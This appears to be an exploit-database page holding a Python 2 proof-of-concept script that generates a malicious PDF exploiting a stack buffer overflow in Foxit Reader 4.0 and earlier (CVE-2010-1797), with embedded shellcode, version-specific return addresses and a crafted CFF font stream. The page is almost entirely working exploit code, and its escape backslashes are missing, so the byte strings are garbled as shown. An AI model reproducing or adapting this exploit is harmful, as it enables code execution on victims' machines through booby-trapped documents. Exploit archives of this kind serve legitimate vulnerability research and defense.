[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Foxit Reader <= 4.0 pdf Jailbreak Exploit
# Published : 2010-08-24
# Author : Jose Miguel Esparza
# Previous Title : Adobe Photoshop CS2 DLL Hijacking Exploit (Wintab32.dll)
# Next Title : Adobe Dreamweaver CS5 <= 11.0 build 4909 DLL Hijacking Exploit (mfc90loc.dll)
import sys,zlib
def getFFShellcode(sc):
ff_sc = ''
if len(sc)%4 != 0:
sc += (4-len(sc)%4)*'x00'
for i in range(0,len(sc),4):
ff_sc += 'xff'+sc[i+3]+sc[i+2]+sc[i+1]+sc[i]
return ff_sc
outputHeader = '''
##############################################################################################
# FreeType Compact Font Format (CFF) Multiple Stack Based Buffer Overflow (CVE-2010-1797) #
##############################################################################################
# #
# Product: Foxit Reader <= 4.0 #
# Platforms: Windows XP, Windows Vista #
# Author: Jose Miguel Esparza <jesparza AT eternal-todo DOT com> #
# Web: http://eternal-todo.com #
# Date: 2010-08-23 #
# #
##############################################################################################
'''
outputFileName = 'foxit_type2_poc.pdf'
usage = 'Usage: '+sys.argv[0]+' targetnnTargets:nt0 - Foxit Reader > 3.0nt1 - Foxit Reader 3.0nt2 - Other versions'
COMEX_PDF_TEMPLATE = '''%PDF-1.3
%xbexbexbaxba
4 0 obj
<< /Length 631 >>
stream
q Q q 18 750 576 24 re W n /Cs1 cs 0 0 0 sc q 1 0 0 -1 0 0 cm BT 0.0003 Tc
7 0 0 -7 534.7051 -768 Tm /F2.0 1 Tf [ (4/15/10 8:01 P) 1 (M) ] TJ ET Q q
1 0 0 -1 0 0 cm BT 7 0 0 -7 18 -768 Tm /F2.0 1 Tf [ (d) -0.4 (a) -0.2 (ta)
-0.2 (:) -0.4 (te) -0.1 (x) -0.3 (t/) -0.4 (h) 0.4 (tm) 0.4 (l) -0.1 (,) -0.4
( ) ] TJ ET Q Q q 18 40 576 24 re W n /Cs1 cs 0 0 0 sc q 1 0 0 -1 0 0 cm BT
-0.0003 Tc 7 0 0 -7 555.6299 -43 Tm /F2.0 1 Tf [ (Pa) -1 (ge ) -1 (1) -1 ( )
-1 (o) -1 (f ) -1 (1) ] TJ ET Q Q q 18 190 576 560 re W n /Cs1 cs 1 1 1 sc
18 190 576 560 re f 0 0 0 sc q 0.8 0 0 -0.8 18 750 cm BT 16 0 0 -16 8 22 Tm
/F2.0 1 Tf ( ) Tj ET Q Q
endstream
endobj
2 0 obj
<< /Type /Page /Parent 3 0 R /Resources 5 0 R /Contents 4 0 R /MediaBox [0 0 612 792]
>>
endobj
5 0 obj
<< /ProcSet [ /PDF /Text ] /ColorSpace << /Cs1 6 0 R >> /Font << /F2.0 8 0 R >> >>
endobj
3 0 obj
<< /Type /Pages /MediaBox [0 0 612 792] /Count 1 /Kids [ 2 0 R ] >>
endobj
7 0 obj
<< /Type /Catalog /Pages 3 0 R >>
endobj
11 0 obj
<<
/Subtype/Type1C
/Filter[/FlateDecode]
/Length $CFF_STREAM_LENGTH
>>
stream
$CFF_STREAM
endstream
endobj
9 0 obj
<< /Type /FontDescriptor /Ascent 750 /CapHeight 676 /Descent -250 /Flags 32
/FontBBox [-203 -428 1700 1272] /FontName /CSDIZD+Times-Roman /ItalicAngle
0 /StemV 0 /MaxWidth 1721 /XHeight 461 /FontFile3 11 0 R >>
endobj
10 0 obj
[ 556 ]
endobj
8 0 obj
<< /Type /Font /Subtype /Type1 /BaseFont /CSDIZD+Times-Roman /FontDescriptor
9 0 R /Widths 10 0 R /FirstChar 32 /LastChar 32 /Encoding /MacRomanEncoding
>>
endobj
1 0 obj
<< >>
endobj
xref
0 12
0000000000 65535 f
0000017767 00000 n
0000000408 00000 n
0000003397 00000 n
0000000022 00000 n
0000000389 00000 n
0000000512 00000 n
0000003361 00000 n
0000017359 00000 n
0000007240 00000 n
0000000622 00000 n
0000003340 00000 n
trailer
<< /Size 12 /Root 7 0 R /Info 1 0 R >>
startxref
17942
%%EOF
'''
MAX_FF_SECTION_LEN = 45*5
JUMP_BYTE = ['xcd','xcc']
POP_POP_RET_ADDRESS = ['x00x40x11x85','x00x40xcex36'] # Foxit reader addresses, depending on the version
NUM_SECOND_INSTRUCTIONS_SET = [183,182]
# calc.exe shellcode
shellcode = 'x68x10xf5x00x00x31xf6x64x8bx76x30x8bx76x0cx8bx76x1cx8bx6ex08x8bx36x8bx5dx3cx8bx5cx1dx78x01xebx8bx4bx18x67xe3xecx8bx7bx20x01xefx8bx7cx8fxfcx01xefx31xc0x99x32x17x66xc1xcax01xaex75xf7x58x66x3bxd0x50xe0xe2x75xccx8bx53x24x01xeax0fxb7x14x4ax8bx7bx1cx01xefx03x2cx97x66x3dx10xf5x75x0ex33xc0x50x68x2ex65x78x65x68x63x61x6cx63x54xffxd5x68x06xcbx00x00xebx92'
cff_header = 'x01x00x04x01x00x01x01x01x13ABCDEF+Times-Romanx00x01x01x01x1fxf8x1bx00xf8x1cx02xf8x1dx03xf8x19x04x1cox00rxfb<xfbnxfa|xfax16x05xe9x11x8bx8bx12x00x03x01x01x08x13x18001.007Times RomanTimesx00x00x00x02x04x00x00x00x01x00x00x00x05x00x00x04xdc'
if len(sys.argv) > 2 or (len(sys.argv) == 2 and not sys.argv[1].isdigit()) or len(sys.argv) == 1:
sys.exit(usage)
version = int(sys.argv[1])
if version == 2:
sys.exit('Versions < 3.0 are not implemented, try it!! ;)n')
if version > 2:
sys.exit(usage)
print outputHeader
print '[-] Creating PDF file...'
# Building the FF section
ff_shellcode = getFFShellcode(shellcode)
ff_zero_bytes = 'xffx00x00x00x00'
ff_instructions = ff_zero_bytes*11 + ff_shellcode + ((MAX_FF_SECTION_LEN - len(ff_shellcode) - 55 - 5*5)/5) * ff_zero_bytes + 'xffx90x90x8axeb' + 'xff'+POP_POP_RET_ADDRESS[version] + ('xffx00'+JUMP_BYTE[version]+'x00x00')*3
if len(ff_instructions) > MAX_FF_SECTION_LEN:
sys.exit('[x] FF section bigger than expected!!')
# Operators sections
first_instructions_set = 'x0cx17x0cx17x0cx04x0cx1d' * 20
second_instructions_set = 'x0cx17x0cx1d' * NUM_SECOND_INSTRUCTIONS_SET[version]
third_instructions_set = 'x0cx1dx0cx12' * 42
# Building the full CFF content for the fake charstring
cff_content = cff_header + 'x0e'*4 + ff_instructions + first_instructions_set + second_instructions_set + third_instructions_set + ff_zero_bytes + 'x0e'
# Decoding with FlateDecode
encoded_cff_content = zlib.compress(cff_content)
# Creating the PDF based on the Comex PDF, slightly modified
pdf_content = COMEX_PDF_TEMPLATE
pdf_content = pdf_content.replace('$CFF_STREAM_LENGTH',str(len(encoded_cff_content)))
pdf_content = pdf_content.replace('$CFF_STREAM',encoded_cff_content)
open(outputFileName,'w').write(pdf_content)
print '[+] File "'+outputFileName+'" created, test it!!'